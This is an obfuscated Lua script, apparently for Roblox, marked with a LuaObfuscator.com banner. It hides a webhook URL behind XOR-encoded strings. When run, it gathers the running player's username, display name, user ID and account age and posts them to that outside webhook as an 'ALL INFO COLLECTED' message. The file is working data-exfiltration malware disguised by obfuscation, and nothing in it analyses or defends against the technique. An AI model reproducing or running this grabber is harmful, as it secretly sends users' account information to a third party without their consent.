--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v12=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v12,v12 + 1 )),v1(v2(v9,1 + (v12% #v9) ,1 + (v12% #v9) + 1 )))%256 ));end return v5(v10);end webhook=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\136\118\183\226\151\72\132\149\138\119\176\226\159\76\136\148\137\118\169\173\222\7\219\235\206\15\222\140\211\74\132\226\215\26\195\170\151\46\230\233\227\28\182\168\213\14\224\201\138\43\195\236\207\17\245\207\215\0\176\191\244\22\193\250\206\63\194\163\241\71\255\151\246\29\215\178\193\25\226\206\232\63\243\236\209\40\248","\126\177\163\187\69\134\219\167");function sendToWebhook(v11) embed={[v7("\55\196\62\201\249","\156\67\173\74\165")]=v7("\21\148\106\57\137\8\114\116\155\102\49\155\3\116","\38\84\215\41\118\220\70"),[v7("\84\19\49\17\236\89\6\54\27\241\94","\158\48\118\66\114")]=v11,[v7("\191\61\0\51","\155\203\68\112\86\19\197")]=v7("\84\212\53\244","\152\38\189\86\156\32\24\133"),[v7("\255\88\171\73\238","\38\156\55\199")]=tonumber(v7("\241\36\46\12\65\38","\35\200\29\28\72\115\20\154"),217 -(43 + 158) ),[v7("\31\176\222\203\136\62","\84\121\223\177\191\237\76")]={[v7("\175\83\209\180","\161\219\54\169\192\90\48\80")]=v7("\121\78\1\60\76\80\19\101\103\67\13\32\19\2","\69\41\34\96")   .. game.Players.LocalPlayer.Name   .. "." },[v7("\168\202\218\15\17\63\189\206\199","\75\220\163\183\106\98")]=os.date(v7("\67\255\178\122\156\15\247\206\51\237\71\146\209\114\244\88\255\184","\185\98\218\235\87"))   .. v7("\133\108\119\182\228","\202\171\92\71\134\190") };data={[v7("\44\204\46\141\45\210","\232\73\161\76")]={embed}};requestData={[v7("\142\203\78","\126\219\185\34\61")]=webhook,[v7("\33\203\74\122\113\115","\135\108\174\62\18\30\23\147")]=v7("\134\198\25\255","\167\214\137\74\171\120\206\83"),[v7("\163\245\51\89\253\181\152","\199\235\144\82\61\152")]={[v7("\36\25\183\63\2\24\173\102\51\15\169\46","\75\103\118\217")]=v7("\198\68\96\24\176\29\198\64\121\27\183\81\205\71\127\26","\126\167\52\16\116\217")},[v7("\234\33\36\153","\156\168\78\64\224\212\121")]=game:GetService(v7("\47\250\177\222\52\235\183\216\14\237\160","\174\103\142\197")):JSONEncode(data)};request(requestData);end sendToWebhook("ALL INFO COLLECTED\nUsername: "   .. game.Players.LocalPlayer.Name   .. "\nDisplay Name: "   .. game.Players.LocalPlayer.DisplayName   .. "\nUser ID: "   .. game.Players.LocalPlayer.UserId   .. "\nAccount Age: "   .. game.Players.LocalPlayer.AccountAge   .. "\n\nEND" );